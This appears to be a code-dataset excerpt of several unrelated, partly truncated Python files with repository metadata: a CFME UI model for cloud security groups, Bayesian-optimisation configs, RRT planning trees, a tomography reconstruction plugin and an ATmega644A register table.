Accordion, BaseEntitiesView, BootstrapSelect, BreadCrumb, ItemsToolBarViewSelector,
ManageIQTree, SummaryTable, Text, TextInput)
|
from widgetastic_patternfly import Dropdown, Button
|
from cfme.base.ui import BaseLoggedInPage
from cfme.exceptions import ItemNotFound, SecurityGroupsNotFound
from cfme.modeling.base import BaseCollection, BaseEntity
from cfme.utils.appliance.implementations.ui import navigate_to, navigator, CFMENavigateStep
from cfme.utils.blockers import BZ
from cfme.utils.wait import wait_for
class SecurityGroupToolbar(View):
configuration = Dropdown('Configuration')
policy = Dropdown('Policy')
download = Dropdown('Download')
view_selector = View.nested(ItemsToolBarViewSelector)
class SecurityGroupDetailsToolbar(View):
configuration = Dropdown('Configuration')
policy = Dropdown('Policy')
download = Button(title='Download summary in PDF format')
class SecurityGroupDetailsAccordion(View):
@View.nested
class properties(Accordion): # noqa
tree = ManageIQTree()
@View.nested
class relationships(Accordion): # noqa
tree = ManageIQTree()
class SecurityGroupDetailsEntities(View):
breadcrumb = BreadCrumb()
title = Text('//div[@id="main-content"]//h1')
properties = SummaryTable(title='Properties')
relationships = SummaryTable(title='Relationships')
smart_management = SummaryTable(title='Smart Management')
firewall_rules = SummaryTable(title="Firewall Rules")
class SecurityGroupAddEntities(View):
breadcrumb = BreadCrumb()
title = Text('//div[@id="main-content"]//h1')
class SecurityGroupAddForm(View):
network_manager = BootstrapSelect(id='ems_id')
name = TextInput(name='name')
description = TextInput(name='description')
cloud_tenant = Select(name='cloud_tenant_id')
add = Button('Add')
cancel = Button('Cancel')
class SecurityGroupView(BaseLoggedInPage):
"""Base view for header and nav checking, navigatable views should inherit this"""
@property
def in_security_groups(self):
return(
self.logged_in_as_current_user and
self.navigation.currently_selected == ['Networks', 'Security Groups'])
class SecurityGroupAllView(SecurityGroupView):
@property
def is_displayed(self):
return (
self.in_security_groups and
self.entities.title.text == 'Security Groups')
toolbar = View.nested(SecurityGroupToolbar)
including_entities = View.include(BaseEntitiesView, use_parent=True)
class SecurityGroupDetailsView(SecurityGroupView):
@property
def is_displayed(self):
expected_title = '{} (Summary)'.format(self.context['object'].name)
return (
self.in_security_groups and
self.entities.title.text == expected_title and
self.entities.breadcrumb.active_location == expected_title)
toolbar = View.nested(SecurityGroupDetailsToolbar)
sidebar = View.nested(SecurityGroupDetailsAccordion)
entities = View.nested(SecurityGroupDetailsEntities)
class SecurityGroupAddView(SecurityGroupView):
@property
def is_displayed(self):
return (
self.in_security_groups and
self.entities.breadcrumb.active_location == 'Add New Security Group' and
self.entities.title.text == 'Add New Security Group')
entities = View.nested(SecurityGroupAddEntities)
form = View.nested(SecurityGroupAddForm)
@attr.s
class SecurityGroup(BaseEntity):
""" Automate Model page of SecurityGroup
Args:
provider (obj): Provider name for Network Manager
name(str): name of the Security Group
description (str): Security Group description
"""
_param_name = "SecurityGroup"
name = attr.ib()
provider = attr.ib()
description = attr.ib(default="")
def refresh(self):
self.provider.refresh_provider_relationships()
self.browser.refresh()
def delete(self, cancel=False, wait=False):
view = navigate_to(self, 'Details')
view.toolbar.configuration.item_select('Delete this Security Group',
handle_alert=(not cancel))
# cancel doesn't redirect, confirmation does
view.flush_widget_cache()
if not cancel:
view = self.create_view(SecurityGroupAllView)
view.is_displayed
view.flash.assert_success_message('Delete initiated for 1 Security Group.')
if wait:
wait_for(
lambda: self.name in view.entities.all_entity_names,
message="Wait Security Group to disappear",
fail_condition=True,
num_sec=500,
timeout=1000,
delay=20,
fail_func=self.refresh
)
@property
def exists(self):
try:
navigate_to(self, 'Details')
except SecurityGroupsNotFound:
return False
else:
return True
@attr.s
class SecurityGroupCollection(BaseCollection):
""" Collection object for the :py:class: `cfme.cloud.SecurityGroup`. """
ENTITY = SecurityGroup
def create(self, name, description, provider, cancel=False, wait=False):
"""Create new Security Group.
Args:
provider (obj): Provider name for Network Manager
name (str): name of the Security Group
description (str): Security Group description
cancel (boolean): Cancel Security Group creation
wait (boolean): wait if Security Group created
"""
view = navigate_to(self, 'Add')
changed = view.form.fill({'network_manager': "{} Network Manager".format(provider.name),
'name': name,
'description': description,
'cloud_tenant': 'admin'})
if cancel and changed:
view.form.cancel.click()
flash_message = 'Add of new Security Group was cancelled by the user'
else:
view.form.add.click()
flash_message = 'Security Group "{}" created'.format(name)
# add/cancel should redirect, new view
view = self.create_view(SecurityGroupAllView)
view.flash.assert_success_message(flash_message)
view.entities.paginator.set_items_per_page(500)
sec_groups = self.instantiate(name, provider, description)
if wait:
wait_for(
lambda: sec_groups.name in view.entities.all_entity_names,
message="Wait Security Group to appear",
num_sec=400,
timeout=1000,
delay=20,
fail_func=sec_groups.refresh,
handle_exception=True
)
return sec_groups
# TODO: Delete collection as Delete option is not available on List view and update
@navigator.register(SecurityGroupCollection, 'All')
class SecurityGroupAll(CFMENavigateStep):
VIEW = SecurityGroupAllView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self, *args, **kwargs):
self.prerequisite_view.navigation.select('Networks', 'Security Groups')
@navigator.register(SecurityGroup, 'Details')
class Details(CFMENavigateStep):
VIEW = SecurityGroupDetailsView
prerequisite = NavigateToAttribute('parent', 'All')
def step(self, *args, **kwargs):
try:
self.prerequisite_view.entities.get_entity(name=self.obj.name, surf_pages=True).click()
except ItemNotFound:
raise SecurityGroupsNotFound("Security Groups {} not found".format(
self.obj.name))
@navigator.register(SecurityGroupCollection, 'Add')
class Add(CFMENavigateStep):
VIEW = SecurityGroupAddView
prerequisite = NavigateToSibling("All")
def step(self, *args, **kwargs):
"""Raises DropdownItemDisabled from widgetastic_patternfly
i
|
markm541374/gpbo
|
gpbo/core/config.py
|
Python
|
agpl-3.0
| 19,809 | 0.01575 |
import gpbo
xrange=range
from gpbo.core import GPdc as GPdc
import scipy as sp
class eimledefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIMAPaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'mprior': sp.array([1.]+[-1]*D),
'sprior': sp.array([2.]*(D+1)),
'kindex': GPdc.MAT52,
'maxf':500+100*D,
'overhead':None,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpmaprecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'smode':'direct',
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
import copy
class eifixdefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIFIXaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'hyper': sp.array([1.]+[0.5]*D),
'kindex': GPdc.MAT52,
'maxf':500+100*D,
'overhead':None,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 2000,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpfixrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'hyper':self.aqpara['hyper'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'smode':'direct',
'dpara':copy.deepcopy(self.aqpara['dpara']),
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eimlelearns():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIMAPaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'mprior': sp.array([1.]+[0.]*D+[-2]),
'sprior': sp.array([1.]*(D+1)+[5]),
'kindex': GPdc.SQUEXPCS,
'maxf':500+100*D,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpmaprecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eihypdefault(object):
def __init__(self,f,D,n,s,path,fname,nrandinit=10,kindex=GPdc.MAT52):
self.aqfn = gpbo.core.acquisitions.eihypaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': nrandinit,
#'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'kindex': kindex,
'DH_SAMPLES': 16+6*D,
'drop':True,
'noS': False,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':1000+200*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eihypgamma(eihypdefault):
def __init__(self,*args,**kwargs):
super(eihypgamma,self).__init__(*args,**kwargs)
D = len(self.aqpara['lb'])
self.reccpara['kindex']=self.aqpara['kindex']= GPdc.MAT52
self.reccpara['mprior']=self.aqpara['mprior']= sp.array([2.]+[3.]*D)
self.reccpara['sprior']=self.aqpara['sprior']= sp.array([0.5]+[0.15]*D)
self.reccpara['priorshape']=self.aqpara['priorshape']='gamma'
class pesfsdefault(object):
def __init__(self,f,D,n,s,path,fname,ninit=10):
self.aqfn = gpbo.core.acquisitions.PESfsaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': ninit,
#'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'priorshape' : 'lognorm',
'kindex': GPdc.MAT52,
'DH_SAMPLES': 16+6*D,
'weighted' : 0,
'DM_SAMPLES': 20+8*D,
'DM_SUPPORT': 750+250*D,
'SUPPORT_MODE': [gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA': 12+4.*D,
'drop':True,
'overhead':'none',
'noS': False,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['l
|
kth-ros-pkg/hfts_grasp_planner
|
src/hfts_grasp_planner/rrt.py
|
Python
|
bsd-3-clause
| 28,198 | 0.003511 |
#!/usr/bin/env python
""" This is a draft modification of the RRT algorithm for the sepcial case
that sampling the goal region is computationally expensive """
import random
import numpy
import time
import math
import logging
import copy
from rtree import index
class SampleData:
def __init__(self, config, data=None, data_copy_fn=copy.deepcopy, id_num=-1):
self._config = config
self._id = id_num
self._data = data
self._dataCopyFct = data_copy_fn
def get_configuration(self):
return self._config
def get_data(self):
return self._data
def copy(self):
copied_data = None
if self._data is not None:
copied_data = self._dataCopyFct(self._data)
return SampleData(numpy.copy(self._config), copied_data, data_copy_fn=self._dataCopyFct, id_num=self._id)
def is_valid(self):
return self._config is not None
def is_equal(self, other_sample_data):
return (self._config == other_sample_data._config).all() and self._data == other_sample_data._data
def get_id(self):
return self._id
def __repr__(self):
return self.__str__()
def __str__(self):
return "{SampleData:[Config=" + str(self._config) + "; Data=" + str(self._data) + "]}"
class TreeNode(object):
def __init__(self, nid, pid, data):
self._id = nid
self._parent = pid
self._data = data
self._children = []
def get_sample_data(self):
return self._data
def get_id(self):
return self._id
def get_parent_id(self):
return self._parent
def add_child_id(self, cid):
self._children.append(cid)
def get_children(self):
return self._children
def __str__(self):
return "{TreeNode: [id=" + str(self._id) + ", Data=" + str(self._data) + "]}"
class Tree(object):
TREE_ID = 0
def __init__(self, root_data, b_forward_tree=True):
self._nodes = [TreeNode(0, 0, root_data.copy())]
self._labeled_nodes = []
self._node_id = 1
self._b_forward_tree = b_forward_tree
self._tree_id = Tree.TREE_ID + 1
Tree.TREE_ID += 1
def add(self, parent, child_data):
"""
Adds the given data as a child node of parent.
@param parent: Must be of type TreeNode and denotes the parent node.
@param child_data: SampleData that is supposed to be saved in the child node (it is copied).
"""
child_node = TreeNode(self._node_id, parent.get_id(), child_data.copy())
parent.add_child_id(child_node.get_id())
self._nodes.append(child_node)
# self._parents.append(parent.get_id())
# assert(len(self._parents) == self._node_id + 1)
self._node_id += 1
return child_node
def get_id(self):
return self._tree_id
def add_labeled_node(self, node):
self._labeled_nodes.append(node)
def get_labeled_nodes(self):
return self._labeled_nodes
def clear_labeled_nodes(self):
self._labeled_nodes = []
def remove_labeled_node(self, node):
if node in self._labeled_nodes:
self._labeled_nodes.remove(node)
def nearest_neighbor(self, sample):
pass
def extract_path(self, goal_node):
path = [goal_node.get_sample_data()]
current_node = goal_node
while current_node.get_id() != 0:
current_node = self._nodes[current_node.get_parent_id()]
path.append(current_node.get_sample_data())
path.reverse()
return path
def get_root_node(self):
return self._nodes[0]
def size(self):
return len(self._nodes)
def merge(self, merge_node_a, other_tree, merge_node_b):
"""
Merges this tree with the given tree. The connection is established through nodeA and nodeB,
for which it is assumed that both nodeA and nodeB represent the same configuration.
        In other words, both the parent and all children of nodeB become children of nodeA.
Labeled nodes of tree B will be added as labeled nodes of tree A.
Runtime: O(size(otherTree) * num_labeled_nodes(otherTree))
@param merge_node_a The node of this tree where to attach otherTree
        @param other_tree The other tree (is not changed)
@param merge_node_b The node of tree B that is merged with mergeNodeA from this tree.
@return The root of treeB as a TreeNode of treeA after the merge.
"""
node_stack = [(merge_node_a, merge_node_b, None)]
b_root_node_in_a = None
while len(node_stack) > 0:
(current_node_a, current_node_b, ignore_id) = node_stack.pop()
for child_id in current_node_b.get_children():
if child_id == ignore_id: # prevent adding duplicates
continue
child_node_b = other_tree._nodes[child_id]
child_node_a = self.add(current_node_a, child_node_b.get_sample_data())
if child_node_b in other_tree._labeled_nodes:
self.add_labeled_node(child_node_a)
node_stack.append((child_node_a, child_node_b, current_node_b.get_id()))
# In case current_node_b is not the root of B, we also need to add the parent
# as a child in this tree.
parent_id = current_node_b.get_parent_id()
if current_node_b.get_id() != parent_id:
if parent_id != ignore_id: # prevent adding duplicates
parent_node_b = other_tree._nodes[current_node_b.get_parent_id()]
child_node_a = self.add(current_node_a, parent_node_b.get_sample_data())
node_stack.append((child_node_a, parent_node_b, current_node_b.get_id()))
if parent_node_b in other_tree._labeled_nodes:
self.add_labeled_node(child_node_a)
else: # save the root to return it
b_root_node_in_a = current_node_a
return b_root_node_in_a
class SqrtTree(Tree):
def __init__(self, root):
super(SqrtTree, self).__init__(root)
self.offset = 0
def add(self, parent, child):
child_node = super(SqrtTree, self).add(parent, child)
self._update_stride()
return child_node
# def clear(self):
# super(SqrtTree, self).clear()
# self.offset = 0
# self.stride = 0
def nearest_neighbor(self, q):
"""
Computes an approximate nearest neighbor of q.
To keep the computation time low, this method only considers sqrt(n)
nodes, where n = #nodes.
This implementation is essentially a copy from:
http://ompl.kavrakilab.org/NearestNeighborsSqrtApprox_8h_source.html
@return The tree node (Type TreeNode) for which the data point is closest to q.
"""
d = float('inf')
nn = None
if self.stride > 0:
for i in range(0, self.stride):
pos = (i * self.stride + self.offset) % len(self._nodes)
n = self._nodes[pos]
dt = numpy.linalg.norm(q - n.get_sample_data().get_configuration())
if dt < d:
d = dt
nn = n
self.offset = random.randint(0, self.stride)
return nn
def _update_stride(self):
self.stride = int(1 + math.floor(math.sqrt(len(self._nodes))))
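# Illustrative sketch (not from the upstream file): minimal use of the data
# structures above — grow a small SqrtTree of SampleData configurations,
# query an approximate nearest neighbour and read back the root-to-node path.
def _sqrt_tree_demo():
    tree = SqrtTree(SampleData(numpy.array([0.0, 0.0])))
    node = tree.get_root_node()
    for x in (0.2, 0.4, 0.6, 0.8):
        node = tree.add(node, SampleData(numpy.array([x, x])))
    near = tree.nearest_neighbor(numpy.array([0.5, 0.5]))
    path = tree.extract_path(near)
    return [sample.get_configuration() for sample in path]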
class RTreeTree(Tree):
def __init__(self, root, dimension, scaling_factors, b_forward_tree=True):
super(RTreeTree, self).__init__(root, b_forward_tree=b_forward_tree)
self._scaling_factors = scaling_factors
self._create_index(dimension)
self.dimension = dimension
self._add_to_idx(self._nodes[0])
def add(self, parent, child_data):
child_node = super(RTreeTree, self).add(parent, child_data)
self._add_to_idx(child_node)
return child_node
def nearest_neighbor(self, sample_data):
if len(self._nodes) == 0:
return None
|
swtp1v07/Savu
|
savu/plugins/scikitimage_filter_back_projection.py
|
Python
|
apache-2.0
| 3,515 | 0 |
import logging
from savu.plugins.base_recon import BaseRecon
from savu.data.process_data import CitationInfomration
from savu.plugins.cpu_plugin import CpuPlugin
import skimage.transform as transform
import numpy as np
from scipy import ndimage
class ScikitimageFilterBackProjection(BaseRecon, CpuPlugin):
"""
A Plugin to reconstruct an image by filter back projection
using the inverse radon transform from scikit-image.
:param output_size: Number of rows and columns in the
reconstruction. Default: None.
:param filter: Filter used in frequency domain filtering
Ramp filter used by default. Filters available: ramp, shepp-logan,
cosine, hamming, hann. Assign None to use no filter. Default: 'ramp'.
:param interpolation: interpolation method used in reconstruction.
Methods available: 'linear', 'nearest', and 'cubic' ('cubic' is slow).
Default: 'linear'.
:param circle: Assume the reconstructed image is zero outside the inscribed
circle. Also changes the default output_size to match the behaviour of
radon called with circle=True. Default: False.
"""
def __init__(self):
logging.debug("initialising Scikitimage Filter Back Projection")
logging.debug("Calling super to make sure that all superclasses are " +
" initialised")
super(ScikitimageFilterBackProjection,
self).__init__("ScikitimageFilterBackProjection")
def _shift(self, sinogram, centre_of_rotation):
centre_of_rotation_shift = (sinogram.shape[0]/2) - centre_of_rotation
return ndimage.interpolation.shift(sinogram,
                                           centre_of_rotation_shift)
def reconstruct(self, sinogram, centre_of_rotation,
angles, shape, center):
print sinogram.shape
sinogram = np.swapaxes(sinogram, 0, 1)
sinogram = self._shift(sinogram, centre_of_rotation)
sino = np.nan_to_num(sinogram)
theta = np.linspace(0, 180, sinogram.shape[1])
result = \
transform.iradon(sino, theta=theta,
                             output_size=(sinogram.shape[0]),
# self.parameters['output_size'],
filter='ramp', # self.parameters['filter'],
interpolation='linear',
# self.parameters['linear'],
circle=False) # self.parameters[False])
return result
def get_citation_inforamtion(self):
cite_info = CitationInfomration()
cite_info.description = \
("The Tomographic reconstruction performed in this processing " +
"chain is derived from this work.")
cite_info.bibtex = \
("@book{avinash2001principles,\n" +
" title={Principles of computerized tomographic imaging},\n" +
" author={Kak, Avinash C. and Slaney, Malcolm},\n" +
" year={2001},\n" +
" publisher={Society for Industrial and Applied Mathematics}\n" +
"}")
cite_info.endnote = \
("%0 Book\n" +
"%T Principles of computerized tomographic imaging\n" +
"%A Kak, Avinash C.\n" +
"%A Slaney, Malcolm\n" +
"%@ 089871494X\n" +
"%D 2001\n" +
"%I Society for Industrial and Applied Mathematics")
cite_info.doi = "http://dx.doi.org/10.1137/1.9780898719277"
return cite_info
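# Illustrative sketch (not from the upstream plugin): stand-alone filtered
# back projection with the same skimage.transform routines the plugin wraps,
# on a synthetic phantom. Only theta/circle are passed so the call stays
# valid across scikit-image versions.
def _fbp_demo():
    phantom = np.zeros((64, 64))
    phantom[24:40, 24:40] = 1.0  # simple square object
    theta = np.linspace(0., 180., 60, endpoint=False)
    sino = transform.radon(phantom, theta=theta, circle=False)
    return transform.iradon(sino, theta=theta, circle=False)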
|
hickey/amforth
|
core/devices/atmega644a/device.py
|
Python
|
gpl-2.0
| 7,375 | 0.071458 |
# Partname: ATmega644A
# generated automatically, do not edit
MCUREGS = {
'ADCSRB': '&123',
'ADCSRB_ACME': '$40',
'ACSR': '&80',
'ACSR_ACD': '$80',
'ACSR_ACBG': '$40',
'ACSR_ACO': '$20',
'ACSR_ACI': '$10',
'ACSR_ACIE': '$08',
'ACSR_ACIC': '$04',
'ACSR_ACIS': '$03',
'DIDR1': '&127',
'DIDR1_AIN1D': '$02',
'DIDR1_AIN0D': '$01',
'UDR0': '&198',
'UCSR0A': '&192',
'UCSR0A_RXC0': '$80',
'UCSR0A_TXC0': '$40',
'UCSR0A_UDRE0': '$20',
'UCSR0A_FE0': '$10',
'UCSR0A_DOR0': '$08',
'UCSR0A_UPE0': '$04',
'UCSR0A_U2X0': '$02',
'UCSR0A_MPCM0': '$01',
'UCSR0B': '&193',
'UCSR0B_RXCIE0': '$80',
'UCSR0B_TXCIE0': '$40',
'UCSR0B_UDRIE0': '$20',
'UCSR0B_RXEN0': '$10',
'UCSR0B_TXEN0': '$08',
'UCSR0B_UCSZ02': '$04',
'UCSR0B_RXB80': '$02',
'UCSR0B_TXB80': '$01',
'UCSR0C': '&194',
'UCSR0C_UMSEL0': '$C0',
'UCSR0C_UPM0': '$30',
'UCSR0C_USBS0': '$08',
'UCSR0C_UCSZ0': '$06',
'UCSR0C_UCPOL0': '$01',
'UBRR0': '&196',
'PORTA': '&34',
'DDRA': '&33',
'PINA': '&32',
'PORTB': '&37',
'DDRB': '&36',
'PINB': '&35',
'PORTC': '&40',
'DDRC': '&39',
'PINC': '&38',
'PORTD': '&43',
'DDRD': '&42',
'PIND': '&41',
'OCR0B': '&72',
'OCR0A': '&71',
'TCNT0': '&70',
'TCCR0B': '&69',
'TCCR0B_FOC0A': '$80',
'TCCR0B_FOC0B': '$40',
'TCCR0B_WGM02': '$08',
'TCCR0B_CS0': '$07',
'TCCR0A': '&68',
'TCCR0A_COM0A': '$C0',
'TCCR0A_COM0B': '$30',
'TCCR0A_WGM0': '$03',
'TIMSK0': '&110',
'TIMSK0_OCIE0B': '$04',
'TIMSK0_OCIE0A': '$02',
'TIMSK0_TOIE0': '$01',
'TIFR0': '&53',
'TIFR0_OCF0B': '$04',
'TIFR0_OCF0A': '$02',
'TIFR0_TOV0': '$01',
'GTCCR': '&67',
'GTCCR_TSM': '$80',
'GTCCR_PSRSYNC': '$01',
'TIMSK2': '&112',
'TIMSK2_OCIE2B': '$04',
'TIMSK2_OCIE2A': '$02',
'TIMSK2_TOIE2': '$01',
'TIFR2': '&55',
'TIFR2_OCF2B': '$04',
'TIFR2_OCF2A': '$02',
'TIFR2_TOV2': '$01',
'TCCR2A': '&176',
'TCCR2A_COM2A': '$C0',
'TCCR2A_COM2B': '$30',
'TCCR2A_WGM2': '$03',
'TCCR2B': '&177',
'TCCR2B_FOC2A': '$80',
'TCCR2B_FOC2B': '$40',
'TCCR2B_WGM22': '$08',
'TCCR2B_CS2': '$07',
'TCNT2': '&178',
'OCR2B': '&180',
'OCR2A': '&179',
'ASSR': '&182',
'ASSR_EXCLK': '$40',
'ASSR_AS2': '$20',
'ASSR_TCN2UB': '$10',
'ASSR_OCR2AUB': '$08',
'ASSR_OCR2BUB': '$04',
'ASSR_TCR2AUB': '$02',
'ASSR_TCR2BUB': '$01',
'WDTCSR': '&96',
'WDTCSR_WDIF': '$80',
'WDTCSR_WDIE': '$40',
'WDTCSR_WDP': '$27',
'WDTCSR_WDCE': '$10',
'WDTCSR_WDE': '$08',
'OCDR': '&81',
'MCUCR': '&85',
'MCUCR_JTD': '$80',
'MCUSR': '&84',
'MCUSR_JTRF': '$10',
'SPMCSR': '&87',
'SPMCSR_SPMIE': '$80',
'SPMCSR_RWWSB': '$40',
'SPMCSR_SIGRD': '$20',
'SPMCSR_RWWSRE': '$10',
'SPMCSR_BLBSET': '$08',
'SPMCSR_PGWRT': '$04',
'SPMCSR_PGERS': '$02',
'SPMCSR_SPMEN': '$01',
'EICRA': '&105',
'EICRA_ISC2': '$30',
'EICRA_ISC1': '$0C',
'EICRA_ISC0': '$03',
'EIMSK': '&61',
'EIMSK_INT': '$07',
'EIFR': '&60',
'EIFR_INTF': '$07',
'PCMSK3': '&115',
'PCMSK3_PCINT': '$FF',
'PCMSK2': '&109',
'PCMSK2_PCINT': '$FF',
'PCMSK1': '&108',
'PCMSK1_PCINT': '$FF',
'PCMSK0': '&107',
'PCMSK0_PCINT': '$FF',
'PCIFR': '&59',
'PCIFR_PCIF': '$0F',
'PCICR': '&104',
'PCICR_PCIE': '$0F',
'ADMUX': '&124',
'ADMUX_REFS': '$C0',
'ADMUX_ADLAR': '$20',
'ADMUX_MUX': '$1F',
'ADC': '&120',
'ADCSRA': '&122',
'ADCSRA_ADEN': '$80',
'ADCSRA_ADSC': '$40',
'ADCSRA_ADATE': '$20',
'ADCSRA_ADIF': '$10',
'ADCSRA_ADIE': '$08',
'ADCSRA_ADPS': '$07',
'DIDR0': '&126',
'DIDR0_ADC7D': '$80',
'DIDR0_ADC6D': '$40',
'DIDR0_ADC5D': '$20',
'DIDR0_ADC4D': '$10',
'DIDR0_ADC3D': '$08',
'DIDR0_ADC2D': '$04',
'DIDR0_ADC1D': '$02',
'DIDR0_ADC0D': '$01',
'TIMSK1': '&111',
'TIMSK1_ICIE1': '$20',
'TIMSK1_OCIE1B': '$04',
'TIMSK1_OCIE1A': '$02',
'TIMSK1_TOIE1': '$01',
'TIFR1': '&54',
'TIFR1_ICF1': '$20',
'TIFR1_OCF1B': '$04',
'TIFR1_OCF1A': '$02',
'TIFR1_TOV1': '$01',
'TCCR1A': '&128',
'TCCR1A_COM1A': '$C0',
'TCCR1A_COM1B': '$30',
'TCCR1A_WGM1': '$03',
'TCCR1B': '&129',
'TCCR1B_ICNC1': '$80',
'TCCR1B_ICES1': '$40',
'TCCR1B_WGM1': '$18',
'TCCR1B_CS1': '$07',
'TCCR1C': '&130',
'TCCR1C_FOC1A': '$80',
'TCCR1C_FOC1B': '$40',
'TCNT1': '&132',
'OCR1A': '&136',
'OCR1B': '&138',
'ICR1': '&134',
'EEAR': '&65',
'EEDR': '&64',
'EECR': '&63',
'EECR_EEPM': '$30',
'EECR_EERIE': '$08',
'EECR_EEMPE': '$04',
'EECR_EEPE': '$02',
'EECR_EERE': '$01',
'TWAMR': '&189',
'TWAMR_TWAM': '$FE',
'TWBR': '&184',
'TWCR': '&188',
'TWCR_TWINT': '$80',
'TWCR_TWEA': '$40',
'TWCR_TWSTA': '$20',
'TWCR_TWSTO': '$10',
'TWCR_TWWC': '$08',
'TWCR_TWEN': '$04',
'TWCR_TWIE': '$01',
'TWSR': '&185',
'TWSR_TWS': '$F8',
'TWSR_TWPS': '$03',
'TWDR': '&187',
'TWAR': '&186',
'TWAR_TWA': '$FE',
'TWAR_TWGCE': '$01',
'UDR1': '&206',
'UCSR1A': '&200',
'UCSR1A_RXC1': '$80',
'UCSR1A_TXC1': '$40',
'UCSR1A_UDRE1': '$20',
'UCSR1A_FE1': '$10',
'UCSR1A_DOR1': '$08',
'UCSR1A_UPE1': '$04',
'UCSR1A_U2X1': '$02',
'UCSR1A_MPCM1': '$01',
'UCSR1B': '&201',
'UCSR1B_RXCIE1': '$80',
'UCSR1B_TXCIE1': '$40',
'UCSR1B_UDRIE1': '$20',
'UCSR1B_RXEN1': '$10',
'UCSR1B_TXEN1': '$08',
'UCSR1B_UCSZ12': '$04',
'UCSR1B_RXB81': '$02',
'UCSR1B_TXB81': '$01',
'UCSR1C': '&202',
'UCSR1C_UMSEL1': '$C0',
'UCSR1C_UPM1': '$30',
'UCSR1C_USBS1': '$08',
'UCSR1C_UCSZ1': '$06',
'UCSR1C_UCPOL1': '$01',
'UBRR1': '&204',
'SPDR': '&78',
'SPSR': '&77',
'SPSR_SPIF': '$80',
'SPSR_WCOL': '$40',
'SPSR_SPI2X': '$01',
'SPCR': '&76',
'SPCR_SPIE': '$80',
'SPCR_SPE': '$40',
'SPCR_DORD': '$20',
'SPCR_MSTR': '$10',
'SPCR_CPOL': '$08',
'SPCR_CPHA': '$04',
'SPCR_SPR': '$03',
'SREG': '&95',
'SREG_I': '$80',
